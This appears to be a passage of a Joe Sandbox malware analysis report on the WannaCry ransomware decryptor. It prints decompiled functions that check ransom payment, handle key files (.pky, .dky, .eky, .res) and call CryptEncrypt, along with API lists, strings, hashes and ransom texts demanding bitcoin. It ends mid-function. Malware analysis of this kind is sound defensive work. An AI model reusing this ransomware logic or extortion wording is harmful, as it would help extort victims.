				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}





























                                                      0x00401766
                                                      0x00401768
                                                      0x0040176d
                                                      0x0040176e
                                                      0x00401775
                                                      0x0040177e
                                                      0x00401780
                                                      0x00401785
                                                      0x0040178f
                                                      0x00401797
                                                      0x004017a5
                                                      0x004017b2
                                                      0x004017b2
                                                      0x004017b8
                                                      0x004017c3
                                                      0x0040193e
                                                      0x00401948
                                                      0x00401955
                                                      0x004017c9
                                                      0x004017c9
                                                      0x004017d2
                                                      0x004018f9
                                                      0x0040192f
                                                      0x00000000
                                                      0x00000000
                                                      0x00401931
                                                      0x00401932
                                                      0x00401934
                                                      0x00401939
                                                      0x00401939
                                                      0x00000000
                                                      0x00401939
                                                      0x00401901
                                                      0x0040191f
                                                      0x0040191f
                                                      0x00401920
                                                      0x00401925
                                                      0x00000000
                                                      0x00401925
                                                      0x00401903
                                                      0x00401909
                                                      0x0040190f
                                                      0x00401913
                                                      0x00000000
                                                      0x00000000
                                                      0x00401915
                                                      0x00401916
                                                      0x00401918
                                                      0x00000000
                                                      0x00401918
                                                      0x004017e3
                                                      0x004017e7
                                                      0x004017e9
                                                      0x004017eb
                                                      0x004017fa
                                                      0x00401801
                                                      0x00401803
                                                      0x00401810
                                                      0x00401811
                                                      0x00401821
                                                      0x00401827
                                                      0x00401829
                                                      0x0040182e
                                                      0x004018da
                                                      0x004018db
                                                      0x004018e0
                                                      0x004018e5
                                                      0x004018ea
                                                      0x00401834
                                                      0x00401844
                                                      0x0040184d
                                                      0x0040185b
                                                      0x00401863
                                                      0x00401870
                                                      0x00401873
                                                      0x00401877
                                                      0x0040187f
                                                      0x0040187f
                                                      0x00401885
                                                      0x00401892
                                                      0x00401893
                                                      0x00401894
                                                      0x00401895
                                                      0x0040189c
                                                      0x004018a1
                                                      0x004018a3
                                                      0x004018a4
                                                      0x004018a6
                                                      0x004018a7
                                                      0x004018af
                                                      0x004018b8
                                                      0x004018bf
                                                      0x004018c8
                                                      0x004018d3
                                                      0x004018d3
                                                      0x00000000
                                                      0x0040182e

                                                      APIs
                                                      • #6453.MFC42 ref: 00401780
                                                      • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                                      • CloseHandle.KERNEL32(?), ref: 004017B2
                                                      • sprintf.MSVCRT ref: 00401811
                                                      • fopen.MSVCRT ref: 00401821
                                                      • fread.MSVCRT ref: 00401844
                                                      • fclose.MSVCRT ref: 0040184D
                                                      • DeleteFileA.KERNEL32(?), ref: 0040185B
                                                      • #537.MFC42(You have a new message:), ref: 00401885
                                                      • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                                      • #1200.MFC42 ref: 004018AF
                                                      • #800.MFC42 ref: 004018BF
                                                      • #800.MFC42 ref: 004018D3
                                                      • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                                      Strings
                                                      • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                                      • %08X.dky, xrefs: 0040180A
                                                      • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                                      • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                                      • You have a new message:, xrefs: 00401877
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                                      • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                                      • API String ID: 2207195628-1375496427
                                                      • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                                      • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x0
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x50c
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540);
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t143 = fopen("00000000.res", "rb");
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143);
						fclose(_t143);
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t146 = fopen( &_v2364, "rb");
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146);
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb");
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149);
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x74e
								_t40 = _t100 + 0x1de; // 0x6ea
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x0
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x5be
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}







































                                                      0x004012e6
                                                      0x004012e8
                                                      0x004012ed
                                                      0x004012ee
                                                      0x004012fb
                                                      0x00401305
                                                      0x00401307
                                                      0x00401316
                                                      0x00401316
                                                      0x00401323
                                                      0x00401339
                                                      0x0040133b
                                                      0x00401343
                                                      0x00401349
                                                      0x0040134e
                                                      0x004013b0
                                                      0x004013be
                                                      0x004013d3
                                                      0x004013db
                                                      0x004013dd
                                                      0x004013e0
                                                      0x004013e2
                                                      0x00401405
                                                      0x00401408
                                                      0x0040141c
                                                      0x00401427
                                                      0x00401440
                                                      0x00401459
                                                      0x0040145b
                                                      0x0040145e
                                                      0x00401460
                                                      0x00401481
                                                      0x00401484
                                                      0x0040148a
                                                      0x0040149e
                                                      0x004014a8
                                                      0x004014aa
                                                      0x004014ac
                                                      0x004014c1
                                                      0x004014d4
                                                      0x004014da
                                                      0x004014dc
                                                      0x004014df
                                                      0x004014e1
                                                      0x00401502
                                                      0x00401507
                                                      0x0040150d
                                                      0x00401513
                                                      0x00401520
                                                      0x00401525
                                                      0x0040152d
                                                      0x0040153e
                                                      0x0040153f
                                                      0x00401547
                                                      0x00401548
                                                      0x00401556
                                                      0x00401557
                                                      0x0040155f
                                                      0x00401567
                                                      0x0040156e
                                                      0x0040156f
                                                      0x00401570
                                                      0x00401575
                                                      0x0040157a
                                                      0x0040157f
                                                      0x00401581
                                                      0x00401587
                                                      0x004015a2
                                                      0x004015a9
                                                      0x004015ae
                                                      0x004015b0
                                                      0x004015be
                                                      0x004015b2
                                                      0x004015b2
                                                      0x004015b2
                                                      0x004015c4
                                                      0x004015cf
                                                      0x00000000
                                                      0x004015cf
                                                      0x004014e3
                                                      0x004014e3
                                                      0x004014e3
                                                      0x00401462
                                                      0x00401462
                                                      0x00401462
                                                      0x004013e4
                                                      0x004013e4
                                                      0x004013e4
                                                      0x00401350
                                                      0x00401354
                                                      0x00401367
                                                      0x00401379
                                                      0x0040139a
                                                      0x004013a4
                                                      0x004013ab
                                                      0x00000000
                                                      0x0040137b
                                                      0x0040137b
                                                      0x00401385
                                                      0x0040138c
                                                      0x004015d3
                                                      0x004015d3
                                                      0x004015d3
                                                      0x00401379
                                                      0x004015e3
                                                      0x004015f0

                                                      APIs
                                                      • sprintf.MSVCRT ref: 00401323
                                                      • sprintf.MSVCRT ref: 00401339
                                                      • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                                      • DeleteFileA.KERNEL32(?), ref: 0040139A
                                                      • fread.MSVCRT ref: 00401405
                                                      • fclose.MSVCRT ref: 00401408
                                                      • sprintf.MSVCRT ref: 00401440
                                                      • fopen.MSVCRT ref: 00401453
                                                        • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                                      • fopen.MSVCRT ref: 004013D5
                                                        • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                                        • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                        • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                                      • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                                      • API String ID: 2787528210-4016014174
                                                      • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                                      • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0();
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

































                                                      0x004076a0
                                                      0x004076a2
                                                      0x004076a7
                                                      0x004076ad
                                                      0x004076ae
                                                      0x004076b5
                                                      0x004076be
                                                      0x004076c1
                                                      0x004076c3
                                                      0x004076c7
                                                      0x004076cb
                                                      0x004076cf
                                                      0x004076d3
                                                      0x004076d9
                                                      0x004076da
                                                      0x004076e0
                                                      0x004076e6
                                                      0x004076e8
                                                      0x004076ed
                                                      0x004076f1
                                                      0x004076f5
                                                      0x004076fa
                                                      0x004076fe
                                                      0x0040770c
                                                      0x00407712
                                                      0x00407712
                                                      0x00407714
                                                      0x0040771e
                                                      0x00407716
                                                      0x00407716
                                                      0x00407716
                                                      0x00407730
                                                      0x00407736
                                                      0x0040773b
                                                      0x0040775b
                                                      0x0040773d
                                                      0x0040773f
                                                      0x00407741
                                                      0x00407745
                                                      0x0040774f
                                                      0x00407747
                                                      0x0040774a
                                                      0x0040774b
                                                      0x0040774b
                                                      0x00407755
                                                      0x00407757
                                                      0x00407757
                                                      0x00407755
                                                      0x00407761
                                                      0x0040776d
                                                      0x00407763
                                                      0x00407763
                                                      0x00407767
                                                      0x00407767
                                                      0x00407784
                                                      0x0040778d
                                                      0x004077aa
                                                      0x004077bf
                                                      0x004077c8
                                                      0x004077d6
                                                      0x004077e6
                                                      0x0040780e
                                                      0x00407814
                                                      0x00407819
                                                      0x0040782c
                                                      0x00407832
                                                      0x0040781b
                                                      0x0040781f
                                                      0x00407820
                                                      0x00407820
                                                      0x00407833
                                                      0x00407838
                                                      0x0040783c
                                                      0x004076d7
                                                      0x00000000
                                                      0x004076d7
                                                      0x0040785b
                                                      0x00407870
                                                      0x00407876
                                                      0x0040787f
                                                      0x0040788a
                                                      0x00407892
                                                      0x00407894
                                                      0x00407896
                                                      0x00407896
                                                      0x004078a0
                                                      0x004078a8
                                                      0x004078db
                                                      0x004078df
                                                      0x004078e3
                                                      0x004078e7
                                                      0x004078e8
                                                      0x004078e9
                                                      0x004078ef
                                                      0x004078f4
                                                      0x004078f5
                                                      0x004078fa
                                                      0x00407901
                                                      0x00407902
                                                      0x00407903
                                                      0x00407908
                                                      0x00407909
                                                      0x0040790e
                                                      0x004078aa
                                                      0x004078aa
                                                      0x004078af
                                                      0x004078b7
                                                      0x004078b8
                                                      0x004078bd
                                                      0x004078be
                                                      0x004078c3
                                                      0x004078ca
                                                      0x004078cb
                                                      0x004078d0
                                                      0x004078d1
                                                      0x004078d6
                                                      0x004078d6
                                                      0x00407917
                                                      0x00407918
                                                      0x0040791d
                                                      0x00407924
                                                      0x00407929
                                                      0x0040792f
                                                      0x0040793e
                                                      0x00407942
                                                      0x00407947
                                                      0x00407950
                                                      0x0040795a
                                                      0x0040796c
                                                      0x00407973
                                                      0x00407984
                                                      0x0040798b
                                                      0x0040798b
                                                      0x00407950
                                                      0x00407994
                                                      0x0040799f
                                                      0x004079af
                                                      0x004079bc

                                                      APIs
                                                      • time.MSVCRT ref: 004076DA
                                                      • sprintf.MSVCRT ref: 0040780E
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                                      • #540.MFC42 ref: 00407876
                                                      • _ftol.MSVCRT ref: 004078AA
                                                      • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                                      • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                                      • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                                      • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                                      • #3092.MFC42(00000402,?), ref: 0040791D
                                                      • #6199.MFC42(00000402,?), ref: 00407924
                                                      • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                                      • #800.MFC42 ref: 0040799F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                                      • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                                      • API String ID: 993288296-3256873439
                                                      • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                                      • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
